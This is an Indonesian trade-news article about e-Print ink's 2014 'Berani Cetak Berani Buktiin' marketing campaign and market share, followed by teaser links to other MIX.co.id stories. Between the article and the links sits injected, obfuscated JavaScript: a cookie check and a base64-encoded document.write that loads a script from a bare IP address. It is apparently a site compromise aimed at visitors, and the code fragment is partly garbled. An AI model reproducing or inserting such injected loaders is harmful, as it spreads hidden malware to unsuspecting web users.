Tahun 2014 adalah tahun politik dimana pasar industri percetakan cenderung melambung dibandingkan industri jasa lainnya. Tak terkecuali pasar tinta. Dikatakan Mariana, Marketing Manager e-Print, naiknya penjualan printer nasional yang diprediksi sampai 13 persen turut mendorong pertumbuhan pasar tinta yang tahun ini diperkirakan lebih dari 20%.
Oleh karena itu, dalam upaya memperkuat brand-nya, tahun 2014 ini e-Print berencana menggelar 600 event dalam Kampanye “Berani Cetak Berani Buktiin” di seluruh Indonesia. Event tersebut terdiri dari workshop untuk guru tentang papercraft. Lalu ada seminar Digital Printing yang akan mengedukasi anak-anak SMK tentang wirausaha. Dan ketiga, School Visit, yaitu kunjungan ke TK, SD, untuk mengedukasi papercraft.”
Selain itu, terkait tahun 2014 dimana akan terselenggara Pemilu dan Piala Dunia, lanjut Mariana, akan ada banyak peluang yang bisa dimanfaatkan dengan produk-produk e-Print. “Melalui Kampanye “Berani Cetak Berani Buktiin” ini, e-Print mendorong para peserta untuk mandiri dengan berwirausaha, seperti membuat mug, pin, atau kaos dengan produk e-Print yang harganya terjangkau,” katanya.
Ia juga mengatakan, berdasarkan data International Data Corporation (IDC), saat ini e-Print yang diproduksi oleh PT Sinar Asia Perkasa (SAP), menguasai hingga 45% market share tinta printer di Indonesia. “Kami optimis, pangsa pasar e-Print tahun ini juga akan meningkat. Salah satunya didorong oleh kampanye “Berani Cetak Berani Buktiin”, dimana kami akan membuktikan kepada customer kalau produk tinta kami berkualitas. Customer juga bisa ber-experience dan mencoba sendiri tinta e-Print,” jelas Mariana.
Sutiono Soemarno, Direktur PT SAP mengatakan, “Produk e-Print saat ini sudah terdistribusi dan didukung oleh dealer yang tersebar di seluruh Indonesia. Mulai Pulau Sumatera, Jawa, Bali, Kalimantan, Sulawesi hingga Papua. Kami juga memasarkannya lewat jalur ritel, antara lain di toko-toko komputer, stationery, dan modern market.” (MS) function getCookie(e)\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time)
MIX.co.id - PT Mitra Boga Ventura (MBV Group) resmi meluncurkan brand kuliner terbarunya, Ayam Cap…
MIX.co.id - Program "Sharp Lovers Day-Fiestapora" baru saja berakhir pada penghujung Maret 2024 lalu. Sukses…
MIX.co.id - Platform periklanan global MGID berhasil menyabet penghargaan Bronze Stevie® Awards di ajang "Asia-Pacific…
MIX.co.id – Perusahaan asuransi umum MPMInsurance, anak perusahaan PT Mitra Pinasthika Mustika Tbk. mengedukasi pentingnya…
MIX.co.id – Kinerja apik berhasil ditorehkan PT Prudential Life Assurance (Prudential Indonesia) dan PT Prudential…
MIX.co.id - Program "PropertyGuru Indonesia Property Awards" akan kembali digelar pada 23 Agustus 2024 mendatang…